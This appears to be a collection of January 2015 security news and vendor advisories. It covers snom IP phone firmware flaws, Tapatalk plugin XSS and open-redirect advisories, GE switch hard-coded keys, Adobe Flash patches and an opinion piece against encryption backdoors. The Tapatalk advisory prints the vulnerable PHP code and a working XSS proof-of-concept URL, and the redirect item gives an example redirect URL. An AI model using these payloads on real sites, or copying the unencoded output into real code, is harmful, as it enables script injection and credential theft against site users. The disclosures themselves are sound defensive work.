vulnerabilities except the current new release 8.7.5.15! Although snom IP phone 710 has been tested, also _all_ other snom desktop IP phone products (e.g. 3xx, 7xx, 8xx, etc) are affected! Vendor contact timeline: ======================== 2014-10-31: Contacting vendor through office@snom.com, requesting security contact, attaching responsible disclosure policy & encryption keys 2014-11-04: No answer, contacting support@snom.com, sales@snom.com & marketing@snom.com, attaching responsible disclosure policy & encryption keys 2014-11-06: Calling German office, trying to reach a security contact, no useful information received Contacting other direct contacts of snom via Sales 2014-11-07: Receiving contact for security communication via Sales, exchanging encryption keys and sending encrypted security advisory to given contact 2014-11-18: Requesting status update - vulnerabilities have been forwarded to developers and are being processed 2014-11-28: Telco with new technical snom contact 2014-12-08 - 2014-12-11: Answering questions of snom regarding some vulnerabilities, postponing advisory release deadline to 13th January 2015, more time needed 2014-12-30: Requesting status update 2015-01-05: Last fixes are already in progress, scheduled for 13th January, receiving document containing detailed information regarding the fixes 2015-01-07: Asking which firmware versions and products are affected 2015-01-08: Calling snom, verifying affected products 2015-01-08: Sending adjusted advisory to snom 2015-01-08: Informing CERT.at and CERT-Bund Germany (BSI) about pending release 2015-01-13: Coordinated release of security advisory Solution: ========= The vendor provides a new firmware version v8.7.5.15 and urges all users to _immediately_ upgrade to this version! Vendor security note & firmware download: http://wiki.snom.com/8.7.5.15_OpenVPN_Security_Update Older firmware branches will not be patched and the upgrade to this new version is therefore absolutely necessary for all users! According to the vendor, the OpenVPN binary will be removed from the firmware per default and can be loaded as a small firmware update afterwards if necessary (see vendor security note above). Users of the OpenVPN feature will get a warning as they will be affected by the identified vulnerability again after enabling the feature. Workaround: =========== No workaround available. The vendor urges all customers to immediately upgrade the firmware of all snom IP phones. Advisory URL: ============= https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF J. Greil / @2015 Source

WoltLab Burning Board 4.0 Tapatalk Cross Site Scripting Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0 RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Tapatalk plugin for the WoltLab Burning Board forum software, which allows attackers to inject arbitrary JavaScript code via URL parameters. Details ======= Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 Affected Versions: >= 1.0.0 Fixed Versions: 1.1.2 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://tapatalk.com Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015 Advisory Status: published CVE: CVE-2014-8869 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869 Introduction ============ "Tapatalk is an app built for interacting with discussion forums on mobile devices. It differs from a forum’s mobile web skin in that it offers the speed of a native app and a streamlined unified interface for every forum a user subscribes to. Tapatalk also creates a unique eco-system that allows forums to be searched and discovered by millions of Tapatalk users which in turn promotes content, new memberships, and interactions." (from Tapatalk's Homepage) More Details ============ The Tapatalk extension includes the PHP script welcome.php at the path com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php which is accessible via the URL http://www.example.com/mobiquo/smartbanner/welcome.php on systems using the plugin. It outputs JavaScript code that includes improperly encoded values from the two URL parameters "app_android_id" and "app_kindle_url". Depending on which parameters is used, one of their values is assigned to the PHP variable $byo: ------------------------------------------------------------------------ <?php [...] else if (isset($_GET['app_android_id'])) { $app_android_id = $_GET['app_android_id']; if ($app_android_id && $app_android_id != '-1') $byo = "&app_android_id=$app_android_id"; } else if (isset($_GET['app_kindle_url'])) { $app_kindle_url = $_GET['app_kindle_url']; if ($app_kindle_url && $app_kindle_url != '-1') $byo = "&app_kindle_url=$app_kindle_url"; } ------------------------------------------------------------------------ Later the $byo variable is used to build a URL without URL encoding it and the URL is used without further encoding in a script element: ------------------------------------------------------------------------ <?php [...] $ads_url = $protocol.'tapatalk.com/welcome_screen.php' .'?referer='.urlencode($referer) .'&code='.urlencode($code) .'&board_url='.urlencode($board_url) .'?='.urlencode($lang) .$byo .'&callback=?'; [...] ?>[...] <script>$.getJSON("<?php echo $ads_url; ?>",function(data){ [...] ------------------------------------------------------------------------ Proof of Concept ================ The following URL can be used to demonstrate the vulnerability: http://www.example.com/mobiquo/smartbanner/welcome.php ?app_kindle_url=");alert('RedTeam Pentesting');</script><!-- The result is a notification showing the text "RedTeam Pentesting". Workaround ========== The PHP function urlencode() should be used to encode the $byo variable before building a URL with it. Fix === Update the plugin to version 1.1.2. Security Risk ============= This security vulnerability is rated as a high risk. It allows to execute arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers. This provides many different possibilities for further attacks against these users. Since the plugin is used for a bulletin board, the vulnerability could be exploited to display a fake login page and obtain credentials from users or administrators. The vulnerability also affects other web applications hosted on the same domain. Timeline ======== 2014-10-20 Vulnerability identified 2014-10-29 CVE number requested 2014-11-14 CVE number assigned 2014-11-26 Vendor notified via https://tapatalk.com/security.php 2014-12-16 Vendor notified again, received reply from vendor 2014-12-16 Vulnerability patched in SCM [0] 2014-12-23 Updated plugin released by vendor [1] 2015-01-08 Vendor updated release notes to mention XSS [2] 2015-01-12 Advisory released References ========== [0] https://github.com/tapatalk/tapatalk-wbb/commit/71024545904024cea9d04a887fdc64b9a9b85871 [1] https://github.com/tapatalk/tapatalk-wbb/commit/31472f6fcfffacd698b0c20809c4a8fb3c4f32f9 [2] https://support.tapatalk.com/threads/19540/#post-146253 RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Source WoltLab Burning Board 4.0 Tapatalk Open Redirect The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by specifying the target URL in the URL parameter board_url in URLs like the following: http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de CVE-2014-8870 was assigned to this issue. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Source

There are few things scarier these days than a politician stepping in front of a microphone, taking a deep breath and opening his mouth to pontificate on security. A long list of American elected officials have reinforced this, and on Monday, UK Prime Minister David Cameron jumped to the head of this undistinguished line with his dangerous statement that encrypted communications shouldn’t be allowed. Cameron, speaking in the wake of the terror attack in Paris last week, said at an event Monday that the UK government can’t allow any form of communication that can’t be read. “Are we going to allow a means of communications which it simply isn’t possible to read?” Cameron said, according to the New York Times. “My answer to that question is: ‘No, we must not.’ “ There are so many problems with what Cameron said that it’s hard to know where to begin. But let’s take it from the top. The government of a free country should not be in the business of allowing or disallowing any form of communication. Those are decisions that should fall to the users and the market, based on the technical and commercial merits of the service. Parliament and Congress have plenty of other things to occupy themselves, and having one of these bodies try to decide whether a given messaging service or Web site doesn’t meet with their approval is not just a waste of time and resources, but scary. The second issue is Cameron’s use of the word “read”. What he’s suggesting here is that the government should have the ability to not just intercept, but decrypt any form of communication that passes through the country’s networks. Thanks to the Snowden leaks, we know that Britain’s GCHQ intelligence service has the ability to intercept essentially whatever traffic it wants through a variety of methods. But in order to decrypt traffic from secure messaging services–apps that have gained huge amounts of popularity in the last couple of years–the UK would need to mandate some kind of backdoor, an idea that’s not just offensive to users but inherently dangerous. As security experts have said for decades now, a backdoor intended for one will end up being be used by all. Attackers and security researchers are really good at finding unintentional weaknesses in software, so just imagine how much fun they’ll have looking for a backdoor that they know is there. “There are enormous problems with this: there’s no back door that only lets good guys go through it. If your Whatsapp or Google Hangouts has a deliberately introduced flaw in it, then foreign spies, criminals, crooked police (like those who fed sensitive information to the tabloids who were implicated in the hacking scandal — and like the high-level police who secretly worked for organised crime for years), and criminals will eventually discover this vulnerability. They — and not just the security services — will be able to use it to intercept all of our communications,” author Cory Doctorow points out in his essay on Cameron’s proposal. Aside from the specter of attackers identifying and exploiting an intentional backdoor, there is the problem of trying to bend software makers to the will of the government. Even if by some miracle the backdoor proposal succeeds, the government still would face the hurdle of getting software makers such as Apple to prevent secure communications apps from showing up in their app store. Apple does what Apple wants and generally not much else. And, as Doctorow says, how would Cameron address the global open source community, which produces much of the secure communications software? These kinds of systems just flat don’t work. “It won’t work. The basic problem with these proposals is they work against regular people who don’t care. But to make it work, you have to close the loopholes,” cryptographer Bruce Schneier, CTO of Co3 Systems, said in an interview. “If you can’t do that, you don’t hurt the bad guys, you only hurt the good guys. It plays well on TV to someone who doesn’t understand the tech. Everything works against my grandmother, but nothing works against professionals.” Someone, or several someones, is giving Cameron terrible advice on this subject and it’s clear that he hasn’t thought through the technical and social implications of what he’s proposing. Security and privacy are properties of free and open societies, not threats to them. Source

There is a hard-coded private SSL key present in a number of hardened, managed Ethernet switches made by GE and designed for use in industrial and transportation systems. Researchers discovered that an attacker could extract the key from the firmware remotely. The vulnerability exists in a number of GE Ethernet switches, including the GE Multilink ML800/1200/1600/2400 Version 4.2.1and prior and GE Multilink ML810/3000/3100 series switch Version 5.2.0 and prior. Researchers at IOActive discovered the vulnerability, and found that it could be exploited remotely. The vulnerability has been disclosed publicly already. “The GE Multilink ML800 is subject to unauthorized access via hard-coded credentials. In addition, availability can be impacted through attacks composed of specifically crafted packets to the web server resulting in switch performance degradation. If attacks continue, the web server will be subject to a denial of service,” the advisory from ICS-CERT says. “The RSA private key used to decrypt SSL traffic in the switch can be obtained from the firmware allowing malicious users to decrypt traffic.” In addition to the hardcoded private key, the IOActive researchers discovered that they could cause a denial-of-service on the Web interface by sending a series of specifically formatted packets. “This denial-of-service attack affects the web interface used to configure the device with a web browser. It is recommended that when deploying the device into a production environment that the web server be disabled in order to effectively mitigate this vulnerability. After disabling the web interface, a user remains able to configure the device locally or remotely through the command line interfaces without risk of this attack. By connecting to the command line interface through serial terminal or telnet, it is possible to disable the web server,” the advisory says. The advisory from GE has instructions on obtaining the patched firmware. Source

Adobe today released the year’s first round of security updates for Flash Player, addressing nine vulnerabilities in the software including several critical bugs that could allow an attacker to take control of an affected system. According to a security bulletin posted by the company today the vulnerabilities affect older versions of Flash on Windows, Macintosh and Linux machines. While version numbers differ by product installation, today’s updates primarily affect Flash Player version 16.0.0.235 and earlier. Researchers working with Google’s Project Zero discovered three of the nine vulnerabilities, all of which can lead to code execution. One of bugs is an information disclosure vulnerability (CVE-2015-0303) dug up by Chris Evans and Tavis Ormandy while another, a type confusion vulnerability (CVE-2015-0305) was found by researcher Natalie Silvanovich, working with Project Zero. Evans also helped Fermin J. Serna, a member of Google’s Security Team in finding a use-after-free bug, which, like the previously mentioned bugs, could lead to code execution. One of the more interesting bugs fixed can apparently be exploited to capture keystrokes on an affected system but no further information on the vulnerability, including who found it, was given by Adobe. A pair of heap-based buffer overflows that could lead to code execution, an improper file validation issue, and an out-of-bounds read vulnerability were also fixed by today’s Patch Tuesday updates. Adobe said none of the vulnerabilities, despite more than half of them being branded critical, are being exploited in the wild. Adobe is encouraging users to update to the most recent build of Flash, 16.0.0.257. While users who have Flash installed via Internet Explorer and Chrome will be automatically updated to the latest version, other users who run a desktop version, will want to update via Adobe’s mechanism when it pops up. Source